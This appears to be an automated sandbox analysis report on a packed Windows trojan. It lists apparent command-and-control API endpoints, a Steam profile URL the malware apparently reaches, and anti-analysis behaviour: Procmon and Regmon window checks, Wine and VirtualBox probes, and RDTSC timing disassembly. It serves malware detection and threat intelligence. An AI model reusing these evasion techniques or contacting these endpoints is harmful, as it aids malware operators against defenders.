    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://eaglepawnoy.store:443/api
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.1359433873.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565531432.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.1359433873.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565531432.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/ER
    Source: file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiJ
    Source: file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiX
    Source: file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apit
    Source: file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apitory
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api%
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spirittunek.store:443/api
    Source: file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/K)
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/lin
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900S)
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://studennotediw.store:443/api
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-man
    Source: file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manqqx
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49709 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49714 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49719 version: TLS 1.2

    System Summary

    Source: file.exe | Static PE information: section name:
    Source: file.exe | Static PE information: section name: .rsrc
    Source: file.exe | Static PE information: section name: .idata
    Source: file.exe | Static PE information: section name:
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1920
    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exe | Static PE information: Section: ZLIB complexity 0.9995681208745875
    Source: file.exe | Static PE information: Section: achgldqf ZLIB complexity 0.9941400277140673
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@10/2
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7352
    Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b35a00f7-448e-4f05-b05e-a590b91281a2
    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: file.exe | Virustotal: Detection: 53%
    Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
    Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1920
    Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
    Source: file.exe | Static file information: File size 1844224 > 1048576
    Source: file.exe | Static PE information: Raw size of achgldqf is bigger than: 0x100000 < 0x198c00

    Data Obfuscation

    Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.6a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;achgldqf:EW;oujhmehu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;achgldqf:EW;oujhmehu:EW;.taggant:EW;
    Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
    Source: file.exe | Static PE information: real checksum: 0x1cea7a should be: 0x1ca74a
    Source: file.exe | Static PE information: section name:
    Source: file.exe | Static PE information: section name: .rsrc
    Source: file.exe | Static PE information: section name: .idata
    Source: file.exe | Static PE information: section name:
    Source: file.exe | Static PE information: section name: achgldqf
    Source: file.exe | Static PE information: section name: oujhmehu
    Source: file.exe | Static PE information: section name: .taggant
    Source: file.exe | Static PE information: section name: entropy: 7.978134199396537
    Source: file.exe | Static PE information: section name: achgldqf entropy: 7.953550554891692

    Boot Survival

    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
    Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880335 second address: 8803D6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CB4F07458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F2CB4F07458h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F2CB4F0745Dh 0x0000002c or dword ptr [ebp+122D35C1h], ecx 0x00000032 mov edx, 0A72DAA4h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a mov si, bx 0x0000003d pop esi 0x0000003e push 32B95A55h 0x00000043 js 00007F2CB4F07465h 0x00000049 jmp 00007F2CB4F0745Fh 0x0000004e xor dword ptr [esp], 32B95AD5h 0x00000055 mov dword ptr [ebp+122D1F89h], edx 0x0000005b push 00000003h 0x0000005d mov esi, 2CBFDFDDh 0x00000062 push 00000000h 0x00000064 mov ecx, dword ptr [ebp+122D386Dh] 0x0000006a push 00000003h 0x0000006c mov edx, 40E02065h 0x00000071 push F1883475h 0x00000076 pushad 0x00000077 pushad 0x00000078 push edi 0x00000079 pop edi 0x0000007a jno 00007F2CB4F07456h 0x00000080 popad 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8803D6 second address: 8803DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8803DA second address: 880427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 31883475h 0x0000000e push edi 0x0000000f mov dx, cx 0x00000012 pop edi 0x00000013 mov esi, 0CDB1576h 0x00000018 lea ebx, dword ptr [ebp+124501F9h] 0x0000001e jmp 00007F2CB4F07464h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F2CB4F07464h 0x0000002c push esi 0x0000002d pop esi 0x0000002e popad 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880427 second address: 88042D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88042D second address: 880431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88049B second address: 88049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88049F second address: 8804A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8804A5 second address: 8804EF instructions: 0x00000000 rdtsc 0x00000002 je 00007F2CB4E5A4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 565CBA3Ch 0x00000011 mov esi, eax 0x00000013 push 00000003h 0x00000015 xor dword ptr [ebp+122D358Fh], esi 0x0000001b push 00000000h 0x0000001d mov edi, dword ptr [ebp+122D284Ah] 0x00000023 push 00000003h 0x00000025 jmp 00007F2CB4E5A4D5h 0x0000002a push B0754DE6h 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0800 second address: 8A0813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F0745Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0813 second address: 8A0834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D1h 0x00000007 jp 00007F2CB4E5A4D2h 0x0000000d js 00007F2CB4E5A4C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B111 second address: 86B119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B119 second address: 86B130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B130 second address: 86B134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E6AA second address: 89E6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E6B0 second address: 89E6D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2CB4F07456h 0x00000008 jnp 00007F2CB4F07456h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jc 00007F2CB4F07456h 0x00000017 jc 00007F2CB4F07456h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EAFD second address: 89EB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CCh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EB19 second address: 89EB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2CB4F07456h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EE3D second address: 89EE43 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EE43 second address: 89EE68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F0745Dh 0x00000007 jl 00007F2CB4F0745Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jng 00007F2CB4F07460h 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EFD7 second address: 89EFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F29D second address: 89F2A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F2A3 second address: 89F2CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2CB4E5A4CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2CB4E5A4D0h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F2CE second address: 89F2D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F6BF second address: 89F6C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F6C3 second address: 89F6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F2CB4F0745Eh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F953 second address: 89F957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F957 second address: 89F969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F0745Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F969 second address: 89F96E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F96E second address: 89F990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F2CB4F0745Eh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FEE1 second address: 89FF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CDh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F2CB4E5A4D2h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FF07 second address: 89FF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2CB4F0745Ah 0x00000008 jne 00007F2CB4F07456h 0x0000000e pop eax 0x0000000f jmp 00007F2CB4F07461h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F2CB4F0745Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 jne 00007F2CB4F07456h 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A00C3 second address: 8A00DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2CB4E5A4CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F2CB4E5A4C6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0216 second address: 8A0227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2CB4F07456h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0227 second address: 8A022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A022D second address: 8A0231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0231 second address: 8A0249 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
